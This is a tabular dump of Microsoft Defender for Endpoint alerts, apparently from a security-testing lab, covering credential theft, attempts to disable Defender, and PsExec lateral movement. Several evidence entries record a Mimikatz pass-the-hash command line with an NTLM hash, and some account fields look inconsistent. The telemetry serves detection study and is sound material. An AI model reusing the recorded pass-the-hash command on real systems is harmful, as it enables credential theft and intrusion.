alertId
stringclasses 278
values | providerAlertId
stringclasses 278
values | incidentId
int64 486
989
⌀ | serviceSource
stringclasses 2
values | creationTime
stringdate 2022-09-30 05:04:51
2023-01-24 06:03:50
⌀ | lastUpdatedTime
stringdate 2022-11-12 01:35:42
2023-01-24 06:05:47
⌀ | resolvedTime
stringclasses 23
values | firstActivity
stringdate 2022-09-07 09:25:00
2023-01-24 05:31:07
⌀ | lastActivity
stringdate 2022-09-30 05:00:00
2023-01-24 05:43:53
⌀ | title
stringclasses 62
values | description
stringclasses 51
values | category
stringclasses 12
values | status
stringclasses 2
values | severity
stringclasses 4
values | investigationId
int64 20
64
⌀ | investigationState
stringclasses 9
values | classification
stringclasses 1
value | determination
stringclasses 1
value | detectionSource
stringclasses 7
values | detectorId
stringclasses 48
values | assignedTo
stringclasses 3
values | actorName
stringclasses 1
value | threatFamilyName
stringclasses 6
values | mitreTechniques
listlengths 0
8
⌀ | devices
listlengths 1
6
⌀ | entities
listlengths 0
49
⌀ | entityType
stringclasses 2
values | evidenceCreationTime
stringclasses 469
values | verdict
stringclasses 5
values | remediationStatus
stringclasses 2
values | accountName
stringclasses 30
values | domainName
stringclasses 17
values | userSid
stringclasses 22
values | aadUserId
stringclasses 8
values | userPrincipalName
stringclasses 14
values | sha1
stringclasses 28
values | sha256
stringclasses 27
values | fileName
stringclasses 21
values | filePath
stringclasses 13
values | processId
int64 0
20.7k
⌀ | processCommandLine
stringclasses 67
values | processCreationTime
stringclasses 133
values | parentProcessId
int64 0
14.6k
⌀ | parentProcessCreationTime
stringclasses 63
values | parentProcessFileName
stringclasses 14
values | parentProcessFilePath
stringclasses 11
values | detectionStatus
stringclasses 1
value | deviceId
stringclasses 9
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
da638041865532032667_1340990957
|
58804b1c-2e93-42c6-8b39-f4524f2513db
| 728
|
MicrosoftDefenderForEndpoint
|
2022-11-16T09:09:13.2032964Z
|
2022-11-19T01:35:45.0566667Z
|
2022-11-19T01:35:45.03Z
|
2022-11-16T09:07:25.1468318Z
|
2022-11-16T09:07:25.1468318Z
|
Attempt to turn off Microsoft Defender Antivirus protection
|
An attempt was made to turn off a protection feature in Microsoft Defender Antivirus. An attacker might be trying to evade detection.
|
DefenseEvasion
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
ac5d5f4f-fab6-41d4-b1b0-552f3c51cea1
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1562.001"
] |
[
{
"aadDeviceId": "c053f02e-4bf2-4146-8faa-8971c550f156",
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-srv2016.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:30:43.818Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jesse",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "7114973b832b32d349815a5d2811738cc10fa650",
"onboardingStatus": "Onboarded",
"osBuild": 14393,
"osPlatform": "WindowsServer2016",
"osProcessor": "x64",
"rbacGroupName": "Servers",
"riskScore": "Low",
"tags": [
"servers"
],
"version": "1607",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Srv2016",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "95663e98-7c5e-4f11-b36d-28fb17df5fe1"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Registry",
"evidenceCreationTime": "2022-11-16T09:09:13.3533333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": "HKEY_LOCAL_MACHINE",
"registryKey": "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
"registryValue": "",
"registryValueType": "Unknown",
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152861366417_-1419039804
|
75bb465a-1c46-44d4-8b7b-99d10c673632
| 486
|
MicrosoftDefenderForEndpoint
|
2022-09-30T06:14:46.1366594Z
|
2022-11-19T01:35:42.7033333Z
|
2022-10-01T01:36:00.5066667Z
|
2022-09-30T06:12:00.7230377Z
|
2022-09-30T06:12:00.7230377Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
|
msftadmin@msdxv2.m365dpoc.com
| null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:46.2833333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.2833333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "61a4a69fc19221b9abcb65a3be09ed3c041d1c42",
"sha256": "3a4ae2a05b8f4cefcad48134573194239d2c1583d5f4d92d295aca7d4120a402",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:46.2833333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-09-30T06:11:59.3259132Z",
"processId": 7288,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:46.2833333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-08-23T12:17:37.8693453Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4668,
"processCommandLine": "\"powershell.exe\" ",
"processCreationTime": "2022-09-30T06:11:13.210308Z",
"processId": 4064,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930750456970_1638136020
|
ef830471-95c7-4a4d-8c45-860205d74e11
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:04:35.0457171Z
|
2022-11-21T02:36:20.0366667Z
| null |
2022-11-21T02:02:06.1870037Z
|
2022-11-21T02:33:42.858223Z
|
Suspicious remote activity
|
Suspicious activity initiated remotely was observed on this machine. This alert can flag attempts to initiate interactive sessions, modify files, pass WMI commands, create scheduled tasks, and other potentially malicious activities from a remote machine.
|
LateralMovement
|
New
|
Medium
| 49
|
PendingApproval
| null | null |
WindowsDefenderAtp
|
64e1767d-3cc3-4573-8707-d2892b79c155
| null | null | null |
[
"T1021",
"T1105",
"T1543.003",
"T1569.002"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Critical",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:04:35.09Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:07:46.14Z
|
Suspicious
|
None
|
root
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:14:47.4866667Z
|
Suspicious
|
None
|
jeff
|
internal.corp
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:16:01.64Z
|
Suspicious
|
None
|
alice
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 8,072
|
PSEXESVC.exe
|
2022-09-30T06:13:03.9136767Z
| 624
|
2022-09-15T03:19:37.3201866Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
36150b3c1b69b5c2da9df4efd86ac6c166924a48
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:17:48.44Z
|
Suspicious
|
None
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930199825735_1916178811
|
65a2531d-394f-42c9-999c-1435a314339e
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:03:39.9825986Z
|
2022-11-26T01:35:43.17Z
|
2022-11-26T01:35:43.0633333Z
|
2022-11-21T02:01:44.3120047Z
|
2022-11-21T02:32:59.4225944Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "staging.net",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "8cd78c31fcbe15d0c3ae78c06e5136983b438586",
"sha256": "5dbd299b13a978274d1a2bf59b58abc66277896c3ab867783f226750d620e4e1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:01:44.2419747Z",
"processId": 7452,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'",
"processCreationTime": "2022-11-21T02:01:28.4753286Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:07:44.1133333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:05:30.8777946Z",
"processId": 5572,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:13:44.1633333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:11:27.7053403Z",
"processId": 6376,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:15:28.2966667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:13:46.7172682Z",
"processId": 10944,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:46.8666667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait",
"processCreationTime": "2022-11-21T02:15:44.11798Z",
"processId": 7388,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:23:43.0433333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "9f01ec196f6e324de6587a716fce47a75fc73bae",
